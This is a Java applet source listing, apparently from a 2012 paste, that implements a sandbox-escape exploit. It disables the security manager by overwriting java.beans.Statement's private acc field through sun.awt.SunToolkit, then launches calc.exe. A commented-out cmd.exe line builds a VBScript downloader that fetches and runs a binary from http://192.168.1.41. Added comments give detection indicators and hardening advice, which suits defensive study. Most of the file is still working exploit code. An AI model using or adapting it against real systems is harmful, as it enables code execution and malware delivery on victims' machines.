
Untitled

a guest
Aug 30th, 2012
  1. package cve2012_java_0day;
  2.  
  3. import java.applet.Applet;
  4. import java.awt.Graphics;
  5. import java.beans.Expression;
  6. import java.beans.Statement;
  7. import java.lang.reflect.Field;
  8. import java.net.URL;
  9. import java.security.*;
  10. import java.security.cert.Certificate;
  11.  
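  /**
   * Proof-of-concept applet for the Java sandbox escape that the enclosing
   * package name ({@code cve2012_java_0day}) refers to.
   *
   * <p>Visible flow: {@link #init()} prints the current security manager, calls
   * {@link #disableSecurity()}, and then starts {@code calc.exe} as a visible
   * marker that code ran outside the applet sandbox.
   *
   * <p>Reading this as a defender:
   * <ul>
   *   <li>The applet code reaches for two things sandboxed code has no business
   *       touching: the JDK-internal class {@code sun.awt.SunToolkit} and the
   *       private {@code acc} field of {@code java.beans.Statement}. Both strings
   *       appear literally in the class and are usable as static indicators.</li>
   *   <li>At run time the observable effect is a child process created by the
   *       JVM that hosts the applet.</li>
   *   <li>Hardening that applies regardless of the exact bug: keep the JRE at a
   *       vendor-fixed release and disable the browser plug-in / applet support
   *       where it is not needed.</li>
   * </ul>
   *
   * <p>NOTE(review): whether each step succeeds depends on the JRE build it runs
   * on; that cannot be confirmed from this listing alone.
   */
  public class Gondvv extends Applet
  {

      /** Creates the applet; all work happens in {@link #init()}. */
      public Gondvv()
      {
      }

      /**
       * Attempts to call {@code System.setSecurityManager(null)} through a
       * {@link Statement} whose access-control context has been replaced.
       *
       * <p>Steps, as written below:
       * <ol>
       *   <li>Create a {@code Statement} targeting {@code System.setSecurityManager}
       *       with a one-element argument array that holds {@code null}.</li>
       *   <li>Build an {@link AccessControlContext} whose single
       *       {@link ProtectionDomain} carries {@link AllPermission}, with a
       *       {@code file:///} code source and no certificates.</li>
       *   <li>Overwrite the statement's private {@code acc} field with that context
       *       via {@link #SetField(Class, String, Object, Object)}.</li>
       *   <li>Execute the statement.</li>
       * </ol>
       *
       * @throws Throwable anything raised by the reflective calls or by
       *         {@code Statement.execute()}
       */
      public void disableSecurity()
          throws Throwable
      {
          // new Object[1] is a single null argument, i.e. setSecurityManager(null).
          Statement localStatement = new Statement(System.class, "setSecurityManager", new Object[1]);
          Permissions localPermissions = new Permissions();
          localPermissions.add(new AllPermission());
          ProtectionDomain localProtectionDomain = new ProtectionDomain(new CodeSource(new URL("file:///"), new Certificate[0]), localPermissions);
          AccessControlContext localAccessControlContext = new AccessControlContext(new ProtectionDomain[] {
              localProtectionDomain
          });
          // Debug output left in by the paste's author.
          System.out.println("Statement.class:"+Statement.class);
          System.out.println("Statement.class.getDeclaredField('acc'):");
          System.out.println(Statement.class.getDeclaredField("acc"));
          SetField(Statement.class, "acc", localStatement, localAccessControlContext);
          localStatement.execute();
      }

      /**
       * Resolves a class by name with a direct {@code Class.forName} call.
       *
       * <p>The commented-out block is an earlier variant from the paste that
       * resolved the class through {@link Expression} instead; it is kept as found.
       *
       * @param paramString fully qualified class name
       * @return the resolved class
       * @throws Throwable if the class cannot be loaded
       */
      private Class<?> GetClass(String paramString)
          throws Throwable
      {
          /*HELLOK*/
          /*
          Object arrayOfObject[] = new Object[1];
          arrayOfObject[0] = paramString;
          System.out.println("GetClass:");
          Expression localExpression = new Expression(Class.class, "forName", arrayOfObject);
          localExpression.execute();
         
          System.out.println("Class.class:"+Class.class);
          System.out.println("localExpression.getValue():"+localExpression.getValue());
          return (Class)localExpression.getValue();
         
          */
          // The original boxed the result in a one-element Object[] and cast it
          // back; returning it directly is equivalent.
          return Class.forName(paramString);
      }

      /**
       * Writes {@code paramObject2} into a named field of {@code paramObject1}.
       *
       * <p>The field is not looked up with ordinary reflection. The lookup is
       * delegated, through {@link Expression}, to a static {@code getField} method
       * on the JDK-internal class {@code sun.awt.SunToolkit}, called with
       * {@code (Statement.class, paramString)}. The paste's own inline comments
       * describe the result as the declared field after {@code setAccessible(true)};
       * that is the author's description, not something visible in this listing.
       *
       * @param paramClass   only logged; the lookup is hard-wired to
       *                     {@code Statement.class} (the single caller passes that
       *                     same class)
       * @param paramString  name of the field to set
       * @param paramObject1 object whose field is overwritten
       * @param paramObject2 value to store
       * @throws Throwable anything raised by class loading, the expression, or
       *         {@code Field.set}
       */
      private void SetField(Class<?> paramClass, String paramString, Object paramObject1, Object paramObject2)
          throws Throwable
      {
          Object arrayOfObject[] = new Object[2];
          //arrayOfObject[0] = paramClass; //java.beans.Statement
          arrayOfObject[0] = Statement.class; //java.beans.Statement
          arrayOfObject[1] = paramString;//acc

          // Resolved once and reused for both the debug line and the expression.
          Class<?> toolkitClass = GetClass("sun.awt.SunToolkit");
          System.out.println("GetClass('sun.awt.SunToolkit'):"+toolkitClass);

          Expression localExpression = new Expression(toolkitClass, "getField", arrayOfObject);
          localExpression.execute();//execute getField
          //Field field = klass.getDeclaredField(fieldName);//Field field="java.beans.Statement".getDeclaredField(acc);
          //field.setAccessible(true);                      //field.setAccessible(true);

          System.out.println("paramClass:"+paramClass);
          System.out.println("paramObject1:"+paramObject1);
          System.out.println("paramObject2:"+paramObject2);
          System.out.println("localExpression.getValue():"+localExpression.getValue());
          ((Field)localExpression.getValue()).set(paramObject1, paramObject2);
      }

      /**
       * Applet entry point: logs the current security manager, runs
       * {@link #disableSecurity()}, then starts {@code calc.exe} and waits for it.
       *
       * <p>Host-side view: the JVM hosting the applet creates a child process. A
       * process-creation event whose parent is the Java plug-in or the
       * {@code java} executable is the simplest indicator for samples of this
       * shape.
       *
       * <p>Any failure is caught and printed; nothing is rethrown to the applet
       * container.
       */
      @Override
      public void init()
      {
          try
          {
              System.out.println("System.getSecurityManager():"+System.getSecurityManager());
              disableSecurity();
              Process localProcess = null;
              // Disabled alternative left in the paste: a single cmd.exe line that
              // writes a VBScript file with echo redirects and starts it with a URL
              // and a target path as arguments. Only the calc.exe marker is active.
             // String command="cmd.exe /c echo Const adTypeBinary = 1 > d:\\apsou.vbs & echo Const adSaveCreateOverWrite = 2 >> d:\\apsou.vbs & echo Dim BinaryStream >> d:\\apsou.vbs & echo Set BinaryStream = CreateObject(\"ADODB.Stream\") >> d:\\apsou.vbs & echo BinaryStream.Type = adTypeBinary >> d:\\apsou.vbs & echo BinaryStream.Open >> d:\\apsou.vbs & echo BinaryStream.Write BinaryGetURL(Wscript.Arguments(0)) >> d:\\apsou.vbs & echo BinaryStream.SaveToFile Wscript.Arguments(1), adSaveCreateOverWrite >> d:\\apsou.vbs & echo Function BinaryGetURL(URL) >> d:\\apsou.vbs & echo Dim Http >> d:\\apsou.vbs & echo Set Http = CreateObject(\"WinHttp.WinHttpRequest.5.1\") >> d:\\apsou.vbs & echo Http.Open \"GET\", URL, False >> d:\\apsou.vbs & echo Http.Send >> d:\\apsou.vbs & echo BinaryGetURL = Http.ResponseBody >> d:\\apsou.vbs & echo End Function >> d:\\apsou.vbs & echo Set shell = CreateObject(\"WScript.Shell\") >> d:\\apsou.vbs & echo shell.Run \"d:\\update.exe\" >> d:\\apsou.vbs " +
             // "& start d:\\apsou.vbs http://192.168.1.41/calc.exe d:\\windows\\update.exe";      
              String command="calc.exe";
              localProcess = Runtime.getRuntime().exec(command);
              //C:\\Users\\hp\\workspace\\cve2012_java_0day\\src\\cve2012_java_0day\\calc.exe
              //calc.exe
              // The original guard ended in a stray semicolon, which made it an
              // empty statement and left waitFor() unconditional.
              if(localProcess != null)
              {
                  localProcess.waitFor();
              }
          }
          catch(Throwable localThrowable)
          {
              localThrowable.printStackTrace();
          }
      }

      /**
       * Draws the placeholder text {@code "Loading"} at (50, 25).
       *
       * @param paramGraphics graphics context supplied by the applet container
       */
      @Override
      public void paint(Graphics paramGraphics)
      {
          paramGraphics.drawString("Loading", 50, 25);
      }
  }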